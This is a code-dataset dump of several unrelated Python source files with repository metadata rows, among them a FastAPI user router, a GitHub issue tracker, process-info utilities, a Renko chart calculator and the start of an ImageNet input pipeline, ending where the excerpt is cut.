# the random_state argument guarantees we get the same split every time we
# run this script.
train_X,test_X,train_y,test_y = train_test_split(X,y,random_state=0)
#Define the model
melbourne_model = DecisionTreeRegressor()
#Fit the model
melbourne_model.fit(train_X,train_y)
# get predicted prices on validation data
test_predictions = melbourne_model.predict(test_X)
mean_absolute_error(test_y,test_predictions)
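# Illustrative follow-up (not part of the original tutorial): printing the training
# error next to the validation error makes the gap described above visible.
train_mae = mean_absolute_error(train_y, melbourne_model.predict(train_X))
validation_mae = mean_absolute_error(test_y, test_predictions)
print("Training MAE:", train_mae, "Validation MAE:", validation_mae)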
| 35.378641
| 353
| 0.791164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,753
| 0.755488
|
a22cbabe9b6d8f3afdad45c7ee147591f90ad7e9
| 3,406
|
py
|
Python
|
src/npu/comprehension.py
|
feagi/feagi
|
598abbe294b5d9cd7ff34861fa6568ba899b2ab8
|
[
"Apache-2.0"
] | 1
|
2022-03-17T08:27:11.000Z
|
2022-03-17T08:27:11.000Z
|
src/npu/comprehension.py
|
feagi/feagi
|
598abbe294b5d9cd7ff34861fa6568ba899b2ab8
|
[
"Apache-2.0"
] | 1
|
2022-02-10T16:30:35.000Z
|
2022-02-10T16:33:21.000Z
|
src/npu/comprehension.py
|
feagi/feagi
|
598abbe294b5d9cd7ff34861fa6568ba899b2ab8
|
[
"Apache-2.0"
] | 1
|
2022-02-07T22:15:54.000Z
|
2022-02-07T22:15:54.000Z
|
# Copyright 2016-2022 The FEAGI Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
def utf_detection_logic(detection_list):
# todo: Add a logic to account for cases were two top ranked items are too close
# Identifies the detected UTF character with highest activity
highest_ranked_item = '-'
second_highest_ranked_item = '-'
for item in detection_list:
if highest_ranked_item == '-':
highest_ranked_item = item
else:
if detection_list[item]['rank'] > detection_list[highest_ranked_item]['rank']:
second_highest_ranked_item = highest_ranked_item
highest_ranked_item = item
elif second_highest_ranked_item == '-':
second_highest_ranked_item = item
else:
if detection_list[item]['rank'] > detection_list[second_highest_ranked_item]['rank']:
second_highest_ranked_item = item
# todo: export detection factor to genome not parameters
detection_tolerance = 1.5
if highest_ranked_item != '-' and second_highest_ranked_item == '-':
print("Highest ranking number was chosen.")
print("1st and 2nd highest ranked numbers are: ", highest_ranked_item, second_highest_ranked_item)
return highest_ranked_item
elif highest_ranked_item != '-' and \
second_highest_ranked_item != '-' and \
detection_list[second_highest_ranked_item]['rank'] != 0:
if detection_list[highest_ranked_item]['rank'] / detection_list[second_highest_ranked_item]['rank'] > \
detection_tolerance:
print("Highest ranking number was chosen.")
print("1st and 2nd highest ranked numbers are: ", highest_ranked_item, second_highest_ranked_item)
return highest_ranked_item
else:
print(">>>> >>> >> >> >> >> > > Tolerance factor was not met!! !! !!")
print("Highest and 2nd highest ranked numbers are: ", highest_ranked_item, second_highest_ranked_item)
return '-'
else:
return '-'
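    # Illustrative example of the tolerance rule above: with
    # {'3': {'rank': 30}, '8': {'rank': 10}} the ratio 30/10 = 3.0 exceeds 1.5, so '3'
    # is returned; with ranks 30 and 25 the ratio is only 1.2 and '-' is returned.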
# list_length = len(detection_list)
# if list_length == 1:
# for key in detection_list:
# return key
# elif list_length >= 2 or list_length == 0:
# return '-'
# else:
# temp = []
# counter = 0
# # print(">><<>><<>><<", detection_list)
# for key in detection_list:
# temp[counter] = (key, detection_list[key])
# if temp[0][1] > (3 * temp[1][1]):
# return temp[0][0]
# elif temp[1][1] > (3 * temp[0][1]):
# return temp[1][0]
# else:
# return '-'
# Load copy of all MNIST training images into mnist_data in form of an iterator. Each object has image label + image
| 44.233766
| 120
| 0.620376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,827
| 0.536406
|
a22ccf953739987c462b05149a48bd232390c0be
| 5,286
|
py
|
Python
|
policyhandler/onap/process_info.py
|
alex-sh2020/dcaegen2-platform-policy-handler
|
e969b079e331cc32b1ca361c49ee7b56e43900a7
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 2
|
2020-07-14T18:54:07.000Z
|
2020-07-14T19:16:06.000Z
|
policyhandler/onap/process_info.py
|
alex-sh2020/dcaegen2-platform-policy-handler
|
e969b079e331cc32b1ca361c49ee7b56e43900a7
|
[
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null |
policyhandler/onap/process_info.py
|
alex-sh2020/dcaegen2-platform-policy-handler
|
e969b079e331cc32b1ca361c49ee7b56e43900a7
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 2
|
2020-07-14T18:53:46.000Z
|
2021-10-15T16:55:54.000Z
|
# ================================================================================
# Copyright (c) 2018 AT&T Intellectual Property. All rights reserved.
# ================================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END=========================================================
#
# ECOMP is a trademark and service mark of AT&T Intellectual Property.
"""generic class to keep get real time info about the current process"""
import gc
import sys
import threading
import traceback
from functools import wraps
import psutil
def safe_operation(func):
"""safequard the function against any exception"""
if not func:
return
@wraps(func)
def wrapper(*args, **kwargs):
"""wrapper around the function"""
try:
return func(*args, **kwargs)
except Exception as ex:
return {type(ex).__name__ : str(ex)}
return wrapper
class ProcessInfo(object):
"""static class to calculate process info"""
_BIBYTES_SYMBOLS = ('KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB')
_BIBYTES_VALS = {}
_inited = False
_lock = threading.Lock()
@staticmethod
def init():
"""init static constants"""
if ProcessInfo._inited:
return
with ProcessInfo._lock:
if ProcessInfo._inited:
return
for i, bibytes_symbol in enumerate(ProcessInfo._BIBYTES_SYMBOLS):
ProcessInfo._BIBYTES_VALS[bibytes_symbol] = 1 << (i + 1) * 10
ProcessInfo._BIBYTES_SYMBOLS = list(reversed(ProcessInfo._BIBYTES_SYMBOLS))
ProcessInfo._inited = True
@staticmethod
def bytes_to_bibytes(byte_count):
"""converts byte count to human value in kibi-mebi-gibi-...-bytes"""
if byte_count is None:
return "unknown"
if not byte_count or not isinstance(byte_count, int):
return byte_count
ProcessInfo.init()
for bibytes_symbol in ProcessInfo._BIBYTES_SYMBOLS:
bibytes_value = ProcessInfo._BIBYTES_VALS[bibytes_symbol]
if byte_count >= bibytes_value:
value = float(byte_count) / bibytes_value
return '%.2f %s' % (value, bibytes_symbol)
return "%s B" % byte_count
@staticmethod
@safe_operation
def process_memory():
"""calculates the memory usage of the current process"""
process = psutil.Process()
with process.oneshot():
return dict((k, ProcessInfo.bytes_to_bibytes(v))
for k, v in process.memory_full_info()._asdict().items())
@staticmethod
@safe_operation
def virtual_memory():
"""calculates the virtual memory usage of the whole vm"""
return dict((k, ProcessInfo.bytes_to_bibytes(v))
for k, v in psutil.virtual_memory()._asdict().items())
@staticmethod
@safe_operation
def active_threads():
"""list of active threads"""
return sorted([thr.name + "(" + str(thr.ident) + ")" for thr in threading.enumerate()])
@staticmethod
@safe_operation
def thread_stacks():
"""returns the current threads with their stack"""
thread_names = dict((thr.ident, thr.name) for thr in threading.enumerate())
return [
{
"thread_id" : thread_id,
"thread_name" : thread_names.get(thread_id),
"thread_stack" : [
{
"filename" : filename,
"lineno" : lineno,
"function" : function_name,
"line" : line.strip() if line else None
}
for filename, lineno, function_name, line in traceback.extract_stack(stack)
]
}
for thread_id, stack in sys._current_frames().items()
]
@staticmethod
@safe_operation
def gc_info(full=False):
"""gets info from garbage collector"""
gc_info = {
"gc_count" : str(gc.get_count()),
"gc_threshold" : str(gc.get_threshold())
}
if gc.garbage:
gc_info["gc_garbage"] = ([repr(stuck) for stuck in gc.garbage]
if full else len(gc.garbage))
return gc_info
@staticmethod
def get_all():
"""all info"""
return {
"active_threads" : ProcessInfo.active_threads(),
"gc" : ProcessInfo.gc_info(full=True),
"process_memory" : ProcessInfo.process_memory(),
"virtual_memory" : ProcessInfo.virtual_memory(),
"thread_stacks" : ProcessInfo.thread_stacks()
}
| 34.54902
| 95
| 0.573023
| 3,810
| 0.720772
| 0
| 0
| 3,754
| 0.710178
| 0
| 0
| 1,702
| 0.321983
|
a22d14123c5934e462a7334c1d55b574adf6c9be
| 3,403
|
py
|
Python
|
10-19/14. normalize_sentences/test_normalize_sentences.py
|
dcragusa/PythonMorsels
|
5f75b51a68769036e4004e9ccdada6b220124ab6
|
[
"MIT"
] | 1
|
2021-11-30T05:03:24.000Z
|
2021-11-30T05:03:24.000Z
|
10-19/14. normalize_sentences/test_normalize_sentences.py
|
dcragusa/PythonMorsels
|
5f75b51a68769036e4004e9ccdada6b220124ab6
|
[
"MIT"
] | null | null | null |
10-19/14. normalize_sentences/test_normalize_sentences.py
|
dcragusa/PythonMorsels
|
5f75b51a68769036e4004e9ccdada6b220124ab6
|
[
"MIT"
] | 2
|
2021-04-18T05:26:43.000Z
|
2021-11-28T18:46:43.000Z
|
import unittest
from textwrap import dedent
from normalize_sentences import normalize_sentences
class NormalizeSentencesTests(unittest.TestCase):
"""Tests for normalize_sentences."""
maxDiff = 1000
def test_no_sentences(self):
sentence = "This isn't a sentence"
self.assertEqual(normalize_sentences(sentence), sentence)
def test_one_sentence(self):
sentence = "This is a sentence."
self.assertEqual(normalize_sentences(sentence), sentence)
def test_two_sentences(self):
sentences = ["Sentence 1.", "Sentence 2."]
self.assertEqual(
normalize_sentences(" ".join(sentences)),
" ".join(sentences),
)
def test_multiple_punctuation_marks(self):
sentences = ["Sentence 1!", "Sentence 2?", "Sentence 3."]
self.assertEqual(
normalize_sentences(" ".join(sentences)),
" ".join(sentences),
)
def test_multiple_paragraphs(self):
sentences = dedent("""
This is a paragraph. With two sentences in it.
And this is one. With three. Three short sentences.
""").strip()
expected = dedent("""
This is a paragraph. With two sentences in it.
And this is one. With three. Three short sentences.
""").strip()
self.assertEqual(
normalize_sentences(sentences),
expected,
)
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_no_extra_spaces(self):
sentences = """
Sentence 1. And two spaces after. But one space after this.
"""
expected = """
Sentence 1. And two spaces after. But one space after this.
"""
self.assertEqual(
normalize_sentences(sentences),
expected,
)
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_with_abbreviations_and_numbers(self):
sentences = "P.S. I like fish (e.g. salmon). That is all."
expected = "P.S. I like fish (e.g. salmon). That is all."
self.assertEqual(
normalize_sentences(sentences),
expected,
)
sentences = "I ate 5.5 oranges. They cost $.50 each. They were good."
expected = "I ate 5.5 oranges. They cost $.50 each. They were good."
self.assertEqual(
normalize_sentences(sentences),
expected,
)
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_excluded_words_work(self):
sentences = (
"Do you know about the work of Dr. Rosalind Franklin? You can "
"find out what she did by using google.com. Google is used by "
"1.17 billion people (as of December 2012). That's a lot people!"
)
expected = (
"Do you know about the work of Dr. Rosalind Franklin? You can "
"find out what she did by using google.com. Google is used by "
"1.17 billion people (as of December 2012). That's a lot people!"
)
self.assertEqual(
normalize_sentences(sentences),
expected,
)
if __name__ == "__main__":
unittest.main(verbosity=2)
| 33.362745
| 78
| 0.601234
| 3,243
| 0.952983
| 0
| 0
| 0
| 0
| 0
| 0
| 1,521
| 0.446959
|
a22d9fe19ea5e2d8a40235675b25713b84b3f165
| 2,673
|
py
|
Python
|
graph/renkolib.py
|
kUNWAR-DIVYANSHU/stockui
|
f85a26b461512fefd33a4f2acfa30d178de3d118
|
[
"MIT"
] | 2
|
2021-08-28T20:37:01.000Z
|
2021-08-30T12:01:33.000Z
|
graph/renkolib.py
|
kUNWAR-DIVYANSHU/stockui
|
f85a26b461512fefd33a4f2acfa30d178de3d118
|
[
"MIT"
] | null | null | null |
graph/renkolib.py
|
kUNWAR-DIVYANSHU/stockui
|
f85a26b461512fefd33a4f2acfa30d178de3d118
|
[
"MIT"
] | null | null | null |
import atrlib
import pandas as pd
# module for calculation of data for renko graph
def renko(df):
d , l , h ,lbo ,lbc,vol=[],[],[],[],[],[]
brick_size = atrlib.brick_size(df)
volume = 0.0
for i in range(0,len(df)):
if i==0:
if(df['close'][i]>df['open'][i]):
d.append(df['date'][i])
l.append(df['open'][i])
h.append(df["close"][i])
lbo.append(df["open"][i])
lbc.append(df["close"][i])
vol.append(df['volume'][i])
else:
d.append(df['date'][i])
l.append(df['close'][i])
h.append(df["open"][i])
lbo.append(df["open"][i])
lbc.append(df["close"][i])
vol.append(df['volume'][i])
else:
volume += df["volume"][i]
leng = len(lbo)
if(lbc[leng-1]>lbo[leng-1]):
if(df["close"][i]>=(lbc[leng-1]+brick_size)):
lbc.append((lbc[leng-1]+brick_size))
lbo.append(lbc[leng-1])
l.append(lbc[leng-1])
h.append((lbc[leng-1]+brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
elif(df["close"][i]<=(lbo[leng-1]-brick_size)):
lbc.append((lbo[leng-1]-brick_size))
lbo.append(lbo[leng-1])
h.append(lbo[leng-1])
l.append((lbo[leng-1]-brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
else:
if(df["close"][i]>=(lbo[leng-1]+brick_size)):
lbc.append((lbo[leng-1]+brick_size))
lbo.append(lbo[leng-1])
l.append(lbo[leng-1])
h.append((lbo[leng-1]+brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
elif(df["close"][i]<=(lbc[leng-1]-brick_size)):
lbc.append((lbc[leng-1]-brick_size))
lbo.append(lbc[leng-1])
h.append(lbc[leng-1])
l.append((lbc[leng-1]-brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
data_ = pd.DataFrame(d,columns=["date"])
data_["open"] = lbo
data_["close"] =lbc
data_["low"] = l
data_["high"] = h
data_['volume']=vol
return data_
| 37.647887
| 63
| 0.412645
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 239
| 0.089413
|
a22ef44872867d8b0cd94176f76c246bfbaa7a25
| 2,846
|
py
|
Python
|
utils/utils.py
|
SoliareofAstora/Metagenomic-DeepFRI
|
7ee12c5bc34f9103f113e93f570719686f856372
|
[
"BSD-3-Clause"
] | null | null | null |
utils/utils.py
|
SoliareofAstora/Metagenomic-DeepFRI
|
7ee12c5bc34f9103f113e93f570719686f856372
|
[
"BSD-3-Clause"
] | null | null | null |
utils/utils.py
|
SoliareofAstora/Metagenomic-DeepFRI
|
7ee12c5bc34f9103f113e93f570719686f856372
|
[
"BSD-3-Clause"
] | 1
|
2022-01-12T10:41:51.000Z
|
2022-01-12T10:41:51.000Z
|
import os
import pathlib
import requests
import shutil
import subprocess
import time
ENV_PATHS = set()
def add_path_to_env(path):
ENV_PATHS.add(path)
def run_command(command, timeout=-1):
if type(command) == str:
command = str.split(command, ' ')
my_env = os.environ.copy()
my_env["PATH"] += ":"+str.join(":", ENV_PATHS)
try:
if timeout > 0:
completed_process = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=my_env, timeout=timeout)
else:
completed_process = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=my_env)
except subprocess.TimeoutExpired:
raise TimeoutError(f"command {' '.join(command)} timeout")
if completed_process.stderr != b'':
error_info = completed_process.stderr.decode()
raise RuntimeError(f"during execution: {' '.join(command)} exception occurred\n{error_info}")
else:
return completed_process.stdout.decode('utf-8')
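# Illustrative usage (hypothetical command): run_command("ls -l", timeout=30) returns the
# command's stdout as a string, raises TimeoutError if it exceeds 30 s, and raises
# RuntimeError if anything was written to stderr.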
def search_files_in_paths(paths: list, pattern: str):
files = []
for path in paths:
if not path.exists():
print(f"Unable to locate {path}.")
continue
if path.is_dir():
files.extend(list(path.glob("**/*"+pattern)))
else:
if not path.name.endswith(pattern):
print(f"{path} is not an {pattern} file which is excepted format.")
else:
files.append(path)
return files
def download_file(url, path):
with requests.get(url, stream=True) as r:
with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
def chunks(lst, n):
if n == 1:
return [lst]
output = []
for i in range(n):
output.append(lst[i::n])
return output
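# For example, chunks([1, 2, 3, 4, 5], 2) returns the interleaved split [[1, 3, 5], [2, 4]].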
def create_unix_timestamp_folder(parent_path):
parent_path = pathlib.Path(parent_path)
start = str(time.time())
path = (parent_path / start)
while path.exists():
time.sleep(1)
start = str(time.time())
path = (parent_path / start)
path.mkdir(parents=True)
return path
def merge_files_binary(file_paths: list, output_path: pathlib.Path):
with open(output_path, 'wb') as writer:
for input_file in file_paths:
with open(input_file, 'rb') as reader:
shutil.copyfileobj(reader, writer)
def parse_input_paths(input_list, project_name, parent_directory):
if input_list is None:
input_paths = [pathlib.Path(parent_directory / project_name)]
else:
input_paths = []
for input_path in [pathlib.Path(x) for x in input_list]:
if input_path.is_absolute():
input_paths.append(input_path)
else:
input_paths.append(parent_directory / input_path)
return input_paths
| 28.747475
| 132
| 0.627899
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 241
| 0.08468
|
a22fe2112341437f4d8c36db1b3319ad00230552
| 2,274
|
py
|
Python
|
fuzzinator/tracker/github_tracker.py
|
akosthekiss/fuzzinator
|
194e199bb0efea26b857ad05f381f72e7a9b8f66
|
[
"BSD-3-Clause"
] | null | null | null |
fuzzinator/tracker/github_tracker.py
|
akosthekiss/fuzzinator
|
194e199bb0efea26b857ad05f381f72e7a9b8f66
|
[
"BSD-3-Clause"
] | null | null | null |
fuzzinator/tracker/github_tracker.py
|
akosthekiss/fuzzinator
|
194e199bb0efea26b857ad05f381f72e7a9b8f66
|
[
"BSD-3-Clause"
] | 1
|
2018-06-28T05:21:21.000Z
|
2018-06-28T05:21:21.000Z
|
# Copyright (c) 2016-2022 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
try:
# FIXME: very nasty, but a recent PyGithub version began to depend on
# pycrypto transitively, which is a PITA on Windows (can easily fail with an
# ``ImportError: No module named 'winrandom'``) -- so, we just don't care
# for now if we cannot load the github module at all. This workaround just
# postpones the error to the point when ``GithubTracker`` is actually used,
# so be warned, don't do that on Windows!
from github import Github, GithubException
except ImportError:
pass
from .tracker import Tracker, TrackerError
class GithubTracker(Tracker):
"""
GitHub_ issue tracker.
.. _GitHub: https://github.com/
**Mandatory parameter of the issue tracker:**
- ``repository``: repository name in user/repo format.
**Optional parameter of the issue tracker:**
- ``token``: a personal access token for authenticating.
**Example configuration snippet:**
.. code-block:: ini
[sut.foo]
tracker=fuzzinator.tracker.GithubTracker
[sut.foo.tracker]
repository=alice/foo
token=1234567890123456789012345678901234567890
"""
def __init__(self, *, repository, token=None):
self.repository = repository
self.ghapi = Github(login_or_token=token)
self.project = self.ghapi.get_repo(repository)
def find_duplicates(self, *, title):
try:
issues = list(self.ghapi.search_issues('repo:{repository} is:issue is:open {title}'.format(repository=self.repository, title=title)))
return [(issue.html_url, issue.title) for issue in issues]
except GithubException as e:
raise TrackerError('Finding possible duplicates failed') from e
def report_issue(self, *, title, body):
try:
new_issue = self.project.create_issue(title=title, body=body)
return new_issue.html_url
except GithubException as e:
raise TrackerError('Issue reporting failed') from e
| 34.454545
| 145
| 0.670624
| 1,454
| 0.639402
| 0
| 0
| 0
| 0
| 0
| 0
| 1,329
| 0.584433
|
a2315dd43508aee4e316bc2ccbff15322163a590
| 2,624
|
py
|
Python
|
qmdz_const.py
|
cygnushan/measurement
|
644e8b698faf50dcc86d88834675d6adf1281b10
|
[
"MIT"
] | 1
|
2022-03-18T18:38:02.000Z
|
2022-03-18T18:38:02.000Z
|
qmdz_const.py
|
cygnushan/measurement
|
644e8b698faf50dcc86d88834675d6adf1281b10
|
[
"MIT"
] | null | null | null |
qmdz_const.py
|
cygnushan/measurement
|
644e8b698faf50dcc86d88834675d6adf1281b10
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import os
from init_op import read_config
# ROOT_PATH = os.path.split(os.path.realpath(__file__))[0]
if getattr(sys, 'frozen', None):
ROOT_DIR = os.path.dirname(sys.executable)
else:
ROOT_DIR = os.path.dirname(__file__)
VI_CONF_PATH = ROOT_DIR + "\conf\VI_CONF.ini"
ST_CONF_PATH = ROOT_DIR + "\conf\ST_CONF.ini"
SC_CONF_PATH = ROOT_DIR + "\conf\SC_CONF.ini"
SYS_CONF_PATH = ROOT_DIR + "\conf\SYS_CONF.ini"
vrange_dict = {0:"AUTO", 1:"1e-6", 2:"10e-6", 3:"100e-6",4:"1e-3", 5:"10e-3",
6:"100e-3", 7:"1", 8:"10", 9:"210"}
irange_dict= {0:"AUTO", 1:"10e-9", 2:"100e-9", 3:"1e-6", 4:"10e-6", 5:"100e-6",
6:"1e-3", 7:"10e-3", 8:"100e-3", 9:"1"}
gas_coef = {0:1.000, 1:1.400, 2:0.446, 3:0.785, 4:0.515, 5:0.610, 6:0.500,
7:0.250, 8:0.410, 9:0.350, 10:0.300, 11:0.250, 12:0.260, 13:1.000,
14:0.740, 15:0.790, 16:1.010, 17:1.000, 18:1.400, 19:1.400, 20:1.000,
21:0.510, 22:0.990, 23:0.710, 24:1.400, 25:0.985, 26:0.630, 27:0.280,
28:0.620, 29:1.360}
res_range = {0:"100", 1:"1e3", 2:"10e3", 3:"100e3", 4:"1e6", 5:"10e6", 6:"100e6", 7:"200e6"}
res_det = 0
VI_ILIST = []
IV_VLIST = []
VI_GAS = []
ST_GAS_AUTO = [0,0,0,0,0,0,0,0]
ST_GAS_MODE = 0 # 0: automatic control, 1: manual
SC_GAS_MODE = 0 # 0: automatic control, 1: manual
SC_FLOW1 = []
SC_FLOW2 = []
SC_FLOW3 = []
SC_GAS_PARA = []
hold_time = 60
low_offset = 0.2
high_offset = 1
up_slot = 1
down_slot = 1
critical_temp = 500
measure_times = 1
temp_list = []
Auto_Range = 1
# Global variables for the 2400 settings
MEAS_MODE = 0 # 0: 2-wire, 1: 4-wire
OUTPUT_MODE = 0 # 0: pulsed output, 1: continuous output
VI_MODE = 1
# Test time periods
TIME_t1 = 0
TIME_t2 = 0
TIME_t3 = 0
TIME_t4 = 0
TIME_SUM = 0
# [flowmeter 1 state, flow value 1, flowmeter 2 state, flow value 2, flowmeter 3 state, flow value 3, air state, air flow value]
t1_gas = []
t2_gas = []
t3_gas = []
t4_gas = []
flowmeter1_state = 0
flowmeter2_state = 0
flowmeter3_state = 0
airpump_state = 0
color_list = ["Aqua","Black","Fuchsia","Gray","Green","Lime","Maroon","Navy",
"Red","Silver","Teal","Yellow","Blue","Olive","Purple","White"]
PARA_NAME = ['SteP','HIAL','LoAL','HdAL','LdAL','AHYS','CtrL','M5',
'P','t','CtI','InP','dPt','SCL','SCH','AOP',
'Scb','OPt','OPL','OPH','AF','RUNSTA','Addr','FILt',
'AmAn','Loc','c01','t01','c02','t02', 'c03','t03']
PARA_DEFAULT = [1,8000,-1960,9999,9999,2,3,50,65,20,2,0,1,0,
5000,5543,0,0,0,100,6,12,1,10,27,808]
def get_range(key):
key_value = read_config(SYS_CONF_PATH, 'HMTS48', key)
return key_value
flow1_range = int(get_range('flow1_range'))
flow2_range = int(get_range('flow2_range'))
flow3_range = int(get_range('flow3_range'))
| 24.523364
| 92
| 0.596418
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 950
| 0.341236
|
a231a6c5e1e9bfd374c54640c8a12d24c01e3857
| 93
|
py
|
Python
|
lattedb/linksmear/apps.py
|
callat-qcd/lattedb
|
75c06748f3d59332a84ec1b5794c215c5974a46f
|
[
"BSD-3-Clause"
] | 1
|
2019-12-11T02:33:23.000Z
|
2019-12-11T02:33:23.000Z
|
lattedb/linksmear/apps.py
|
callat-qcd/lattedb
|
75c06748f3d59332a84ec1b5794c215c5974a46f
|
[
"BSD-3-Clause"
] | 10
|
2020-01-29T17:06:01.000Z
|
2021-05-31T14:41:19.000Z
|
lattedb/linksmear/apps.py
|
callat-qcd/lattedb
|
75c06748f3d59332a84ec1b5794c215c5974a46f
|
[
"BSD-3-Clause"
] | null | null | null |
from django.apps import AppConfig
class LinkSmearConfig(AppConfig):
name = "linksmear"
| 15.5
| 33
| 0.763441
| 56
| 0.602151
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 0.11828
|
a232ee55bbdd0227f3c92c01f62af655cba96907
| 2,088
|
py
|
Python
|
project/repository/user.py
|
tobiasaditya/fastapi-blog
|
0f50f4261755f926ce9e951db8237a5f38384dcb
|
[
"MIT"
] | null | null | null |
project/repository/user.py
|
tobiasaditya/fastapi-blog
|
0f50f4261755f926ce9e951db8237a5f38384dcb
|
[
"MIT"
] | null | null | null |
project/repository/user.py
|
tobiasaditya/fastapi-blog
|
0f50f4261755f926ce9e951db8237a5f38384dcb
|
[
"MIT"
] | null | null | null |
from typing import List
from fastapi import APIRouter
from fastapi.params import Depends
from fastapi import HTTPException, status
from sqlalchemy.orm.session import Session
from project import schema, models, database, hashing
router = APIRouter(
prefix="/user",
tags=['Users']
)
@router.post('/new')
def create_user(request:schema.User, db:Session = Depends(database.get_db)):
hashed_pass = hashing.get_password_hash(request.password)
new_user = models.User(name = request.name,username = request.username, password = hashed_pass)
db.add(new_user)
db.commit()
db.refresh(new_user)
return request
@router.get('/find', response_model= List[schema.showUser])
def show_user_all(db:Session=Depends(database.get_db)):
all_users = db.query(models.User).all()
return all_users
@router.get('/find/{id}',response_model= schema.showUser)
def show_user_id(id:int, db:Session = Depends(database.get_db)):
selected_project = db.query(models.User).filter(models.User.id == id).first()
if not selected_project:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"User {id} not found.")
return selected_project
# @router.put('/{id}')
# def update_project_id(id:int,request:schema.Project,db:Session = Depends(database.get_db)):
# #Search for projects' id
# selected_project = db.query(models.Project).filter(models.Project.id == id)
# if not selected_project.first():
# raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"Project {id} not found.")
# selected_project.update(dict(request))
# return {'status':f'project {id} updated'}
# @router.delete('/{id}')
# def delete_project_id(id:int,db:Session = Depends(database.get_db)):
# selected_project = db.query(models.Project).filter(models.Project.id == id).first()
# if not selected_project:
# raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"Project {id} not found.")
# db.delete(selected_project)
# db.commit()
# return {'status':f'delete project_id {id} successful'}
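# Illustrative sketch (not part of the original module): mounting the router on a FastAPI
# app and exercising it with the test client. The JSON field names follow the usage of
# schema.User above; a working database.get_db dependency is assumed.
def _example_client_usage():
    from fastapi import FastAPI
    from fastapi.testclient import TestClient
    app = FastAPI()
    app.include_router(router)
    client = TestClient(app)
    client.post('/user/new', json={'name': 'Ada', 'username': 'ada', 'password': 'secret'})
    return client.get('/user/find').json()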
| 33.142857
| 102
| 0.724617
| 0
| 0
| 0
| 0
| 881
| 0.421935
| 0
| 0
| 945
| 0.452586
|
a23471f40d09455ca7a0123fbc08ae7b2e5ada89
| 17,643
|
py
|
Python
|
milking_cowmask/data_sources/imagenet_data_source.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 23,901
|
2018-10-04T19:48:53.000Z
|
2022-03-31T21:27:42.000Z
|
milking_cowmask/data_sources/imagenet_data_source.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 891
|
2018-11-10T06:16:13.000Z
|
2022-03-31T10:42:34.000Z
|
milking_cowmask/data_sources/imagenet_data_source.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 6,047
|
2018-10-12T06:31:02.000Z
|
2022-03-31T13:59:28.000Z
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ImageNet input pipeline.
"""
import os
import pickle
import jax
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow_datasets as tfds
TRAIN_IMAGES = 1281167
TEST_IMAGES = 50000
MEAN_RGB = [0.485 * 255, 0.456 * 255, 0.406 * 255]
STDDEV_RGB = [0.229 * 255, 0.224 * 255, 0.225 * 255]
def normalize_image(image):
image -= tf.constant(MEAN_RGB, shape=[1, 1, 3], dtype=image.dtype)
image /= tf.constant(STDDEV_RGB, shape=[1, 1, 3], dtype=image.dtype)
return image
def random_crop(image,
min_object_covered=0.1,
aspect_ratio_range=(0.75, 1.33),
area_range=(0.05, 1.0),
max_attempts=100,):
"""Randomly crop an input image.
Args:
image: The image to be cropped.
min_object_covered: The minimal percentage of the target object that should
be in the final crop.
aspect_ratio_range: The cropped area of the image must have an aspect
ratio = width / height within this range.
area_range: The cropped area of the image must contain a fraction of the
input image within this range.
    max_attempts: Number of attempts at generating a cropped region of the image
      that satisfies the specified constraints. After max_attempts failures,
the original image is returned.
